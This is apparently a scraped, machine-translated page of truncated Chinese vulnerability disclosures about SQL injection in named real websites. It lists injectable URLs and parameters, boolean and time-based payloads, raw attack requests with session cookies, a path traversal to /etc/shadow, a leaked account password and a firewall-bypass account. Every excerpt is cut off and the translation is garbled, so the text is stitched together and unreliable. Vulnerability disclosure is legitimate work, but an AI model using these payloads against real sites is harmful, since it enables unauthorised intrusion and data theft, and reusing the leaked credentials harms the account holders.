scan website for sql injection vulnerabilities


Lenovo Internet official website SQL injection vulnerability and repair solution

Http://www.leadsec.com.cn/news/detail.aspxthe classidfilter is not fully split. SQL Injection exists on the page Http://www.leadsec.com.cn/News/Detail.aspx? RootID = 150 Aid = 1858 ClassID = 153and 1 = 1 --Http://www.leadsec.com.cn/News/Detail.aspx? RootID = 150 Aid = 1858 ClassID = 153and 1 = 2 --Database Version: Microsoft SQL Server 2000-8.00.760 (Intel X

SQL Injection and repair exist on multiple pages of the mobile WAP website of Qixin and huashun

Brief description: Xin Tong huashun Network Information Co., Ltd. provides mobile WAP access to the website for financial information access. SQL Injection exists on multiple pages. Detailed description: Databases on the SQL Injection page of the company use the MYSQL Root

SQL Injection and repair of website construction system on zule activity Platform

A severe mysql injection vulnerability exists in the website construction system of zule activity platform. The construction system includes Mengniu sour milk and other influential websites. Among them, Mengniu sour milk database contains a large number of Sina and authorized tokens for logon by users. I thought Mengniu sour milk http://www.mnssr.com is a self-built site, background guess the background foun

6CMS enterprise website management system (Chinese and English Traditional Chinese Version) SQL injection vulnerability and repair

Author: Monkey QQ: 812009485 I just got home from the holiday. I am idle and have nothing to do, and it's heavy snow. I don't want to go out and soak mm .. Suddenly I saw an enterprise cms, So I downloaded the program. G.cn Keyword: 6CMS enterprise Site Management System (Chinese and English Traditional Chinese Version) Default Account Password: admin Background: admin/ I don't know how the programmer got it. I can see that the admin directory of the program has an anti-

SQL injection vulnerability in a website under Zhongguancun online

SQL injection vulnerability in a website under Zhongguancun online Zhongguancun online under a station SQL injection vulnerability http://easyxiu.zol.com.cn/H/ POST/H/action /? Act = order HTTP/1.1Content-Length: 75Content-Type: application/x-www-form-urlencodedX-Requested

SQL Injection Vulnerability and repair solution on the official website of a mountain spring

SQL injection attacks are not effectively prevented. This vulnerability can directly cause leakage of company-related confidential information. Detailed Description: directly submit the SQL injection vulnerability location Http://www.nongfuspring.com/app/newsDetail.action? HeadtodetailId = 853 Proof of vulnerability: Due t

Obtain the website path through SQL Injection

If the website only opens port 80, you will find that the following method is more useful. The methods used are almost none I have found. I have some personal experience and skills in injection. There are four methods (currently known) Method 1: This is the method described in Take advantage of sqlserver's xp_dirtree. Okay, let's take a look at the method first, and then let's talk about its advantages and disadvantages (based on the original article) C

Practically bypassing WEB Protection and SQL Injection rules of 360 website guard

During the test, the dongle intercepted the SQL query on the website where the dongle was used. However, the dongle was able to bypass the security and obtain the database information. For the protection device, if important information is obtained by the passer when it is enabled, I think it has been bypassed... the test procedure is as follows: bbs.siteserver.cn installed the url of the dongle request to

SQL Injection + File Inclusion Vulnerability in a website of China Telecom

SQL Injection + File Inclusion Vulnerability in a website of China Telecom Rear one: http://rs.hntelecom.net.cn/HRSystem/initIndex.doBACKGROUND Two: http://rs.hntelecom.net.cn/loginadmin.do? M = loginVulnerability Type 1:The file contains: rs.hntelecom.net.cn/filedown.do? M = filedown path = /.. /.. //.. /.. //.. /.. //.. /.. //.. /.. // etc/shadow % 00 No. root

51CTO technical website has SQL Injection Vulnerability

51CTO technical website has SQL Injection Vulnerability Detailed description: POST/salary/show. php HTTP/1.1Content-Length: Your content-type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://fellow.51cto.comHost: fellow.51cto. comConnection: Keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)

Kingsoft Ciba has SQL injection in the background of a website.

Kingsoft Ciba has SQL injection in the background of a website. Kingsoft Injection of this site beforeWooYun: a management system leaked a lot of Kingsoft MAC (tftp + ftp account 30 + decrypted MD5 enters the management background)Decrypt the login with the first account posted Chenhui1 password chenhui2Log on to

Alimama travel website has SQL Injection

Alimama travel website has SQL Injection (⊙ O ⊙ )... If a problem occurs at a point, check whether there are any problems with all similar points .... POST/lvyou/dest_index/AjaxGetTripList HTTP/1.1Content-Length: 66Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.lvmama.com/lvyou/Cookie: uid = wKgKcFZNZmCynk9 + CC

A website in CSDN has the SQL blind injection vulnerability.

A website in CSDN has the SQL blind injection vulnerability. Http://edu.csdn.net/courses? Attr = 3 c_id = 0 level = 1 payload: blind Note 1 = 1 Parameter: level (GET) Type: boolean-based blind Title: AND boolean-based blind-WHERE or HAVING clause Payload: attr = 3 c_id = 0 level = 1 AND 2659 = 2659 Type: AND/OR time-based blind Title: MySQL> = 5.0.12 AND time

SQL Injection for an important website of Tom Online

SQL Injection for an important website of Tom Online POST /redeem/tom_ecardExchange.php HTTP/1.1Content-Length: 191Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://tangyuan.tom.com/Cookie: PHPSESSID=0bfa903262d197b1a2039b9b8ef55db0; tom_test=rPcet0oDU!4!1!1459218920!1459219309!4!0!http://tangyuan.tom.com/redeem/game

The SQL injection vulnerability exists on a website of touniu tourism network.

The SQL injection vulnerability exists on a website of touniu tourism network. POST/ajax/membercard HTTP/1.1Content-Length: 149Content-Type: application/x-www-form-urlencodedX-Requested-With: Signature: http://passport.tuniu.comCookie: PASSPORTSESSID = signature; login_user_name = rslydfdvHost: passport. tuniu. comConnection: Keep-aliveAccept-Encoding: gzip, d

Advanced SQL Server injection in website Security Detection

Preface: Other basic injection methods are not described in detail. Unable to understand the injection basics of this site Article . For better use of injection, we suggest you read the SQL syntax articles on this site. [Retrieve all database names]Select name from Master. DBO. sysdatabases where dbid = 7 // The v

Metinfo enterprise website management system SQL injection and repair solution

Member/getpassword. php and admin/getpassword. php files If ($ p) {$ array = explode ('. ', base64_decode ($ p); $ SQL = "SELECT * FROM $ met_admin_table WHERE admin_id = '". $ array [0]. "'"; $ sqlarray = $ db-> get_one ($ SQL ); The base64_decode ($ p) value is separated by explode and then submitted to the $ array. Finally, $ array [0] enters the SQL query,

An SQL Injection vulnerability on yonyou website and its repair

A second-level website has an injection, which can report errors and cross-database operations. Dbo permission Proof of vulnerability: Error injection: Http://tclub.ufida.com.cn/buyservice.asp? Money67 = 0 checkbox = 69 Money69 = 100 checkbox = 75 Money75 = 0 money = 2012-12-20 flag = shopcar shopcarflag = gwc iRemainMoney = checkbox = 63 Money63 = 0 checkbox = 65 Money65 = 0 checkbox = 66 Money66

A5 latency of SQL Injection in a website

Http://3g.admin5.com /? Appid = 330051% 27% 20and % 20 sleep % 282% 29% 3d % 27 host = admin5.com src = http://bbs.admin5.com/forum.php? Mod = viewthread tid = 10112420 http://3g.admin5.com /? Appid = 330051% 27% 20and % 20 sleep % 281% 29% 3d % 27 host = admin5.com src = http://bbs.admin5.com/forum.php? Mod = viewthread tid = 10112420 http://3g.admin5.com /? Appid = 330051% 27% 20and % 20 sleep % 280% 29% 3d % 27 host = admin5.com src = http://bbs.admin5.com/forum.php? Mod = viewthread
